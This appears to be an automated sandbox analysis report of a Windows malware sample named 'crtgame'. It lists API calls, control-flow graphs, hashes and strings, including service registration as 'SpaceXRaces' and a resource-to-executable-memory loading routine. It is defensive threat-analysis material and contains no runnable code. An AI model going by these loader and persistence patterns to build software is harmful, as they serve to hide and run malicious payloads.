                                                                              • API String ID: 1703294689-0
                                                                              • Opcode ID: 78841f2a515f296da85e0e90675676ac3a79d5512f1734095c42bbe5f9917e88
                                                                              • Instruction ID: 04da20acb35bf9441239f1d62556dfb4fa7ea4fed694bd47aa7006e356793b78
                                                                              • Opcode Fuzzy Hash: 78841f2a515f296da85e0e90675676ac3a79d5512f1734095c42bbe5f9917e88
                                                                              • Instruction Fuzzy Hash: 8E01D2B2648300DEDA10AF65FE44A0A7BA4FBD4790B10857FF281771E0D739A851CA2E

                                                                              Control-flow Graph (basic blocks listed as node id, address range and the API or call it contains, recovered from the rendered graph; edges follow)
                                                                              • 165 4032aa-4032c8 HeapCreate
                                                                              • 166 403300-403302
                                                                              • 167 4032ca-4032d7 call 403162
                                                                              • 170 4032e6-4032e9
                                                                              • 171 4032d9-4032e4 call 403307
                                                                              • 172 403303-403306
                                                                              • 173 4032eb call 403b58
                                                                              • 177 4032f0-4032f2
                                                                              • 178 4032f4-4032fa HeapDestroy
                                                                              • Edges: 165->166, 165->167, 167->170, 167->171, 170->172, 170->173, 171->177, 173->177, 177->172, 177->178, 178->166
                                                                              APIs
                                                                              • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402FD1,00000000), ref: 004032BB
                                                                                • Part of subcall function 00403162: GetVersionExA.KERNEL32 ref: 00403181
                                                                              • HeapDestroy.KERNEL32 ref: 004032FA
                                                                                • Part of subcall function 00403307: HeapAlloc.KERNEL32(00000000,00000140,004032E3,000003F8), ref: 00403314
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$AllocCreateDestroyVersion
                                                                              • String ID:
                                                                              • API String ID: 2507506473-0
                                                                              • Opcode ID: 0b849b835aecce10534f7c8868f1023d210904a4762ffb57ab141a925f8bfac6
                                                                              • Instruction ID: 5e09d6e980c9b6bd0e9d6ae44655ccf46c8d477683af571ce1b4adb312d05453
                                                                              • Opcode Fuzzy Hash: 0b849b835aecce10534f7c8868f1023d210904a4762ffb57ab141a925f8bfac6
                                                                              • Instruction Fuzzy Hash: C5F065306543019AEB201F309E4AB2A3EA89754757F14483BF841FD1D1EF7D8691950E

                                                                              APIs
                                                                              • RegisterServiceCtrlHandlerA.ADVAPI32(SpaceXRaces,Function_000023D3), ref: 00402436
                                                                              • SetServiceStatus.ADVAPI32(0040A058), ref: 00402495
                                                                              • GetLastError.KERNEL32 ref: 00402497
                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004024A4
                                                                              • GetLastError.KERNEL32 ref: 004024C5
                                                                              • SetServiceStatus.ADVAPI32(0040A058), ref: 004024F5
                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00002351,00000000,00000000,00000000), ref: 00402501
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040250A
                                                                              • CloseHandle.KERNEL32 ref: 00402516
                                                                              • SetServiceStatus.ADVAPI32(0040A058), ref: 0040253F
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                              • String ID: SpaceXRaces
                                                                              • API String ID: 3346042915-182686438
                                                                              • Opcode ID: cdb2bee97ed7bb97cf955b6f798025c993403a3b9e37aa79489956d55700b49b
                                                                              • Instruction ID: 823e7604a9f11b62abb5769871faa090ae10b28c447e591ffcb139ee33df3efb
                                                                              • Opcode Fuzzy Hash: cdb2bee97ed7bb97cf955b6f798025c993403a3b9e37aa79489956d55700b49b
                                                                              • Instruction Fuzzy Hash: F821A9B0841348EBD2119F36FF48E177FA8EB96719715813AE505B22B0C7BA0464DF2E

                                                                              Control-flow Graph (basic blocks listed as node id, address range and the API or call it contains, recovered from the rendered graph; edges follow)
                                                                              • 212 405b6f-405b9d
                                                                              • 213 405be5-405be8
                                                                              • 214 405b9f-405bb9 LCMapStringW
                                                                              • 215 405bc3-405bd5 LCMapStringA
                                                                              • 216 405bbb-405bc1
                                                                              • 217 405bfa-405c02
                                                                              • 218 405bea-405bf7 call 405d93
                                                                              • 219 405bdb
                                                                              • 220 405cfd
                                                                              • 222 405c21-405c24
                                                                              • 223 405c04-405c1c LCMapStringA
                                                                              • 225 405cff-405d10
                                                                              • 226 405c2a-405c2d
                                                                              • 227 405c37-405c5b MultiByteToWideChar
                                                                              • 228 405c2f-405c34
                                                                              • 229 405c61-405c95 call 402da0
                                                                              • 233 405c97-405cae MultiByteToWideChar
                                                                              • 234 405cb0-405cc9 LCMapStringW
                                                                              • 235 405ccb-405ccf
                                                                              • 236 405d11-405d47 call 402da0
                                                                              • 237 405cd1-405cd4
                                                                              • 238 405cda-405cdd
                                                                              • 239 405d8c-405d8e
                                                                              • 241 405cdf-405cf7 LCMapStringW
                                                                              • 244 405d49-405d5f LCMapStringW
                                                                              • 245 405d61-405d66
                                                                              • 246 405d68-405d6a
                                                                              • 247 405d6c-405d6f
                                                                              • 248 405d72-405d86 WideCharToMultiByte
                                                                              • Edges: 212->213, 212->214, 213->217, 213->218, 214->215, 214->216, 215->219, 215->220, 216->213, 217->222, 217->223, 218->217, 219->213, 220->225, 222->220, 222->226, 223->225, 226->227, 226->228, 227->220, 227->229, 228->227, 229->220, 229->233, 233->220, 233->234, 234->220, 234->235, 235->236, 235->237, 236->220, 236->244, 237->238, 237->239, 238->220, 238->241, 239->225, 241->220, 241->239, 244->220, 244->245, 245->246, 245->247, 246->248, 247->248, 248->220, 248->239
                                                                              APIs
                                                                              • LCMapStringW.KERNEL32(00000000,00000100,004065F4,00000001,00000000,00000000,00000103,00000001,00000000,?,00404EE3,00200020,00000000,?,00000000,00000000), ref: 00405BB1
                                                                              • LCMapStringA.KERNEL32(00000000,00000100,004065F0,00000001,00000000,00000000,?,00404EE3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405BCD
                                                                              • LCMapStringA.KERNEL32(?,?,?,?,N@ ,?,00000103,00000001,00000000,?,00404EE3,00200020,00000000,?,00000000,00000000), ref: 00405C16
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00404EE3,00200020,00000000,?,00000000,00000000), ref: 00405C4E
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CA6
                                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CBC
                                                                              • LCMapStringW.KERNEL32(?,?,?,00000000,N@ ,?,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CEF
                                                                              • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405D57
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: String$ByteCharMultiWide
                                                                              • String ID: N@
                                                                              • API String ID: 352835431-2588724849
                                                                              • Opcode ID: 50f7acbb545500e936848391daa4b4f79838f587710a5a8d37350ffe5be9aa75
                                                                              • Instruction ID: 59135ce53bc3b83908b259842d99def5e9dba23692ba7c4f82a52b333c41bde6
                                                                              • Opcode Fuzzy Hash: 50f7acbb545500e936848391daa4b4f79838f587710a5a8d37350ffe5be9aa75
                                                                              • Instruction Fuzzy Hash: 69516B31500609ABDF218F54CD45E9F7BB9EB48710F10813AF912B12A0D33A9961EF69

                                                                              Control-flow Graph (basic blocks listed as node id, address range and the API or call it contains, recovered from the rendered graph; edges follow)
                                                                              • 249 4058a7-4058b2
                                                                              • 250 4058b4-4058c3 LoadLibraryA
                                                                              • 251 4058f6-4058fd
                                                                              • 252 4058c5-4058da GetProcAddress
                                                                              • 253 40592c-40592e
                                                                              • 254 405915-405921
                                                                              • 255 4058ff-405905
                                                                              • 256 405928-40592b
                                                                              • 257 4058dc-4058f1 GetProcAddress * 2
                                                                              • 259 405907-40590e
                                                                              • 260 405910-405913
                                                                              • Edges: 249->250, 249->251, 250->252, 250->253, 251->254, 251->255, 252->253, 252->257, 253->256, 254->256, 255->254, 255->259, 257->251, 259->254, 259->260, 260->254
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00404D6D,?,Microsoft Visual C++ Runtime Library,00012010,?,00406528,?,00406578,?,?,?,Runtime Error!Program: ), ref: 004058B9
                                                                              • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004058D1
                                                                              • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004058E2
                                                                              • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004058EF
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoad
                                                                              • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll$xe@
                                                                              • API String ID: 2238633743-4073082454
                                                                              • Opcode ID: ee458f46fe1812a05d91eb71287a3930c9b5d9979fa11f14182ddc6a57f11331
                                                                              • Instruction ID: 33924f41f48bfa595f86144282b4f53d1c2fc39b1daf6c652de04afaa2dac454
                                                                              • Opcode Fuzzy Hash: ee458f46fe1812a05d91eb71287a3930c9b5d9979fa11f14182ddc6a57f11331
                                                                              • Instruction Fuzzy Hash: F4017171640711EFC7109FB5AD8091B3BE8EA887A0712043FA505F23E2DA7988619F2D

                                                                              Control-flow Graph (basic blocks listed as node id, address range and the API or call it contains, recovered from the rendered graph; edges follow)
                                                                              • 262 405dbe-405ded
                                                                              • 263 405e2d-405e30
                                                                              • 264 405def-405e05 GetStringTypeW
                                                                              • 265 405e32-405e37
                                                                              • 266 405e56-405e59
                                                                              • 267 405e07-405e09
                                                                              • 268 405e0b-405e1f GetStringTypeA
                                                                              • 269 405e39
                                                                              • 270 405e3e-405e51 GetStringTypeA
                                                                              • 271 405ef3
                                                                              • 272 405e5f-405e62
                                                                              • 273 405e28
                                                                              • 274 405e25-405e27
                                                                              • 275 405ef5-405f06
                                                                              • 276 405e64-405e69
                                                                              • 277 405e6c-405e8e MultiByteToWideChar
                                                                              • 278 405e90-405ec8 call 402da0 call 402ca0
                                                                              • 284 405eca-405ee1 MultiByteToWideChar
                                                                              • 285 405ee3-405ef1 GetStringTypeW
                                                                              • Edges: 262->263, 262->264, 263->265, 263->266, 264->267, 264->268, 265->269, 265->270, 266->271, 266->272, 267->273, 268->271, 268->274, 269->270, 270->275, 271->275, 272->276, 272->277, 273->263, 274->273, 276->277, 277->271, 277->278, 278->271, 278->284, 284->271, 284->285, 285->275
                                                                              APIs
                                                                              • GetStringTypeW.KERNEL32(00000001,004065F4,00000001,00000000,00000103,00000001,00000000,00404EE3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DFD
                                                                              • GetStringTypeA.KERNEL32(00000000,00000001,004065F0,00000001,?,?,00000000,00000000,00000001), ref: 00405E17
                                                                              • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00404EE3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405E4B
                                                                              • MultiByteToWideChar.KERNEL32(N@ ,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00404EE3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405E83
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00405ED9
                                                                              • GetStringTypeW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00405EEB
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: StringType$ByteCharMultiWide
                                                                              • String ID: N@
                                                                              • API String ID: 3852931651-2588724849
                                                                              • Opcode ID: b846b538efdd308b61092c0b21f0a934ff7444516eeaa1663e1030bce46bb4c8
                                                                              • Instruction ID: efd9f9df0c83a1a94f90d52e1acc00adac850a8b7f95784ade7c71040f2db77a
                                                                              • Opcode Fuzzy Hash: b846b538efdd308b61092c0b21f0a934ff7444516eeaa1663e1030bce46bb4c8
                                                                              • Instruction Fuzzy Hash: 6E414C72900619AFCF209F94DD85EAF7B78FB08750F10443AF912B2290D7398A619B99
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00404CB6
                                                                              • GetStdHandle.KERNEL32(000000F4,00406528,00000000,?,00000000,00000000), ref: 00404D8C
                                                                              • WriteFile.KERNEL32(00000000), ref: 00404D93
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: File$HandleModuleNameWrite
                                                                              • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                              • API String ID: 3784150691-4022980321
                                                                              • Opcode ID: 3f183e7b97676ec7bc44c608dee57f0da837cd1f80663b04b7f3573c67123c93
                                                                              • Instruction ID: 66213c8598c100419aca2a23d32cbd7848d5265dc6afe1337dc7fe815477c880
                                                                              • Opcode Fuzzy Hash: 3f183e7b97676ec7bc44c608dee57f0da837cd1f80663b04b7f3573c67123c93
                                                                              • Instruction Fuzzy Hash: 4B31A7B2600218BEEF20EA60DD49FDA376CEF85304F1005BBF545F61D1D6B8AD548A5D
                                                                              APIs
                                                                              • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FF6), ref: 0040477B
                                                                              • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FF6), ref: 0040478F
                                                                              • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FF6), ref: 004047BB
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FF6), ref: 004047F3
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FF6), ref: 00404815
                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402FF6), ref: 0040482E
                                                                              • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FF6), ref: 00404841
                                                                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040487F
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                              • String ID:
                                                                              • API String ID: 1823725401-0
                                                                              • Opcode ID: 5b86ae991fad7257a9556b843b73270ba3d506a60895f98d1aae2807b58742cd
                                                                              • Instruction ID: d94799acc24e98fca2fbef921ce91b810f6c8713fa78e77f5a065486d65e4eae
                                                                              • Opcode Fuzzy Hash: 5b86ae991fad7257a9556b843b73270ba3d506a60895f98d1aae2807b58742cd
                                                                              • Instruction Fuzzy Hash: CA31F2F75042A55ED7207BB59C8483B76DCE6C5358711893FFA42F3280E6398C4186A9
                                                                              APIs
                                                                              • FindResourceA.KERNEL32(00000000,0000000A,00000000), ref: 00402011
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,004023A6,00000190,00409F34,?,00000000), ref: 0040201D
                                                                              • SizeofResource.KERNEL32(00000000,?,?,?,?,?,004023A6,00000190,00409F34,?,00000000), ref: 0040202A
                                                                              • LoadResource.KERNEL32(00000000,?,?,?,?,?,004023A6,00000190,00409F34,?,00000000), ref: 00402044
                                                                              • LockResource.KERNEL32(00000000,?,?,?,?,?,004023A6,00000190,00409F34,?,00000000), ref: 0040204B
                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,004023A6,00000190,00409F34,?,00000000), ref: 00402056
                                                                              • GetTickCount.KERNEL32 ref: 00402092
                                                                              • GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,004023A6,00000190,00409F34), ref: 004020F8
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                              • String ID:
                                                                              • API String ID: 564119183-0
                                                                              • Opcode ID: f1ea5436b47a97949242679e62fd8c16215760983c098ca12679752f31ddac83
                                                                              • Instruction ID: ecab55d02aed30cb2302f8ec7062e98c1eb40003726056bc5c009be87fd8cf01
                                                                              • Opcode Fuzzy Hash: f1ea5436b47a97949242679e62fd8c16215760983c098ca12679752f31ddac83
                                                                              • Instruction Fuzzy Hash: 1C313C71A003456FDF118BB99E88AAF7F78EF49344B10803AFA46F72C1D6748940C768
                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,74DF30D0,00000000,?,0040238C,00000000,?,00000000), ref: 004021E3
                                                                              • GetLastError.KERNEL32(?,?,?,?,0040238C,00000000), ref: 00402298
                                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000000,?,?,?,?,0040238C,00000000), ref: 004022A5
                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004022E0
                                                                              • Sleep.KERNEL32(000003E8,?,?,?,?,0040238C,00000000), ref: 00402336
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: AddressAllocErrorLastLibraryLoadProcSleepVirtual
                                                                              • String ID: (
                                                                              • API String ID: 2871813557-3887548279
                                                                              • Opcode ID: 7f0dd8bc027646a7730874866425c3d0ac7d12c98f25a8e59b63077f83e1171d
                                                                              • Instruction ID: fa8a78d08e5b147245ce613c51b7eec45b3ed4bb95c194ee9eab5a02c05580c9
                                                                              • Opcode Fuzzy Hash: 7f0dd8bc027646a7730874866425c3d0ac7d12c98f25a8e59b63077f83e1171d
                                                                              • Instruction Fuzzy Hash: DE516375A00215EFDB14CF98C984BAEB7B5FF44304F2480AAE905AB3C1D7B5EA51CB94
                                                                              APIs
                                                                              • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,004032F0), ref: 00403B79
                                                                              • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,004032F0), ref: 00403B9D
                                                                              • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,004032F0), ref: 00403BB7
                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,004032F0), ref: 00403C78
                                                                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,004032F0), ref: 00403C8F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual$FreeHeap
                                                                              • String ID: @q@$@q@
                                                                              • API String ID: 714016831-1591251108
                                                                              • Opcode ID: 53fa90f427eeffaf6ecb660fffee8fa42559a5708230ede92574a81e60caacf4
                                                                              • Instruction ID: 6b7d5d1079877a4fdc04a989ad5d4427692f66b21ec07018b92eff91f37320a0
                                                                              • Opcode Fuzzy Hash: 53fa90f427eeffaf6ecb660fffee8fa42559a5708230ede92574a81e60caacf4
                                                                              • Instruction Fuzzy Hash: 47311071A447019BE3308F28DD49B22BBA8E74475AF00423BE155FB3D1E778B9008B0D
                                                                              APIs
                                                                              • GetVersionExA.KERNEL32 ref: 00403181
                                                                              • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 004031B6
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403216
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentFileModuleNameVariableVersion
                                                                              • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                              • API String ID: 1385375860-4131005785
                                                                              • Opcode ID: ae729fa98e27c6751e545e4d597dad0f21c0824f8bd7fd76f6a38a193a7a3fad
                                                                              • Instruction ID: 0bfe33c8882bc5da799f901860b26a8a70e2baa25249e611fba62494fac00854
                                                                              • Opcode Fuzzy Hash: ae729fa98e27c6751e545e4d597dad0f21c0824f8bd7fd76f6a38a193a7a3fad
                                                                              • Instruction Fuzzy Hash: FA3124719052846EEB319A705C55BDA3F6C9B0730AF2404FFD085F92C2E63D8F8A8B19
                                                                              APIs
                                                                              • GetStartupInfoA.KERNEL32(?), ref: 004048EB
                                                                              • GetFileType.KERNEL32(00000800), ref: 00404991
                                                                              • GetStdHandle.KERNEL32(-000000F6), ref: 004049EA
                                                                              • GetFileType.KERNEL32(00000000), ref: 004049F8
                                                                              • SetHandleCount.KERNEL32 ref: 00404A2F
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: FileHandleType$CountInfoStartup
                                                                              • String ID:
                                                                              • API String ID: 1710529072-0
                                                                              • Opcode ID: 6f1dcd6f7bcd673d6421e3e5aab1f6b36c8d09db57b6c5e6c0d92ede4df305ad
                                                                              • Instruction ID: 4e5b6c2e9b57b0b0783508239f10a0ad73356ae994103a46a91c1c9ef3db655a
                                                                              • Opcode Fuzzy Hash: 6f1dcd6f7bcd673d6421e3e5aab1f6b36c8d09db57b6c5e6c0d92ede4df305ad
                                                                              • Instruction Fuzzy Hash: EF5124F16043608BD7208B38CD447673BA0BB81324F1A473AE6E6FB2E1D73C8855875A
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CA6
                                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CBC
                                                                              • LCMapStringW.KERNEL32(?,?,?,00000000,N@ ,?,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CEF
                                                                              • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405D57
                                                                              • WideCharToMultiByte.KERNEL32(?,00000220,?,00000000,N@ ,?,00000000,00000000,?,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405D7C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: String$ByteCharMultiWide
                                                                              • String ID: N@
                                                                              • API String ID: 352835431-2588724849
                                                                              • Opcode ID: 2e404fdc1400399f752b075283bc6775304d52c7d5638f1181ef196f2002daac
                                                                              • Instruction ID: 20da4dc5c4367d057857615b5720e39787682ab55b18fc8d36651601e05c1bdf
                                                                              • Opcode Fuzzy Hash: 2e404fdc1400399f752b075283bc6775304d52c7d5638f1181ef196f2002daac
                                                                              • Instruction Fuzzy Hash: 1C11D432900609ABDF228F94CD44ADFBBB6EB48750F148166FE16721A0D3368D61DF64
                                                                              APIs
                                                                              • VirtualFree.KERNEL32(000000FF,00000000,00008000,@q@,00403D9C,@q@,74DEDFF0,?,00000000,?,?,00403E4E,00000010,00403103,?,?), ref: 00403CAB
                                                                              • HeapFree.KERNEL32(00000000,?,?,00403E4E,00000010,00403103,?,?), ref: 00403CE1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: Free$HeapVirtual
                                                                              • String ID: @q@$@q@
                                                                              • API String ID: 3783212868-1591251108
                                                                              • Opcode ID: 7ac4ff149bfc0749d320f4b1f8ac69e321ccad7dceeb4d9086af9ddb8db2ce1d
                                                                              • Instruction ID: f6895fdbbb123314fbd550313b942ac7b83e67952c1407439619f49545067eb6
                                                                              • Opcode Fuzzy Hash: 7ac4ff149bfc0749d320f4b1f8ac69e321ccad7dceeb4d9086af9ddb8db2ce1d
                                                                              • Instruction Fuzzy Hash: 88F03431A04210DFD3249F28EE09A427BF4FB08710B014A2AE4A6AB3E1C731AC40CF48
                                                                              APIs
                                                                              • GetCPInfo.KERNEL32(?,00000000), ref: 0040571A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1703831679.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000004.00000002.1703831679.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_400000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: Info
                                                                              • String ID: $
                                                                              • API String ID: 1807457897-3032137957
                                                                              • Opcode ID: db703bf84d1e74bea7e02b3975d1c483e6a577ba1b4e559dc1a3ea706ac2fa80
                                                                              • Instruction ID: f7edae9c6ae74023553f5d2ec798d7d3c7047796f49532e24c337197b6512109
                                                                              • Opcode Fuzzy Hash: db703bf84d1e74bea7e02b3975d1c483e6a577ba1b4e559dc1a3ea706ac2fa80
                                                                              • Instruction Fuzzy Hash: 494154320007A85EEB15A724DD49BFB3FA9DB06704F1400F6D946FB192C27949289FAF
                                                                              APIs
                                                                              • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00403774,?,?,?,00000100,?,00000000), ref: 004039D4
                                                                              • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00403774,?,?,?,00000100,?,00000000), ref: 00403A08
                                                                              • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00403774,?,?,?,00000100,?,00000000), ref: 00403A22
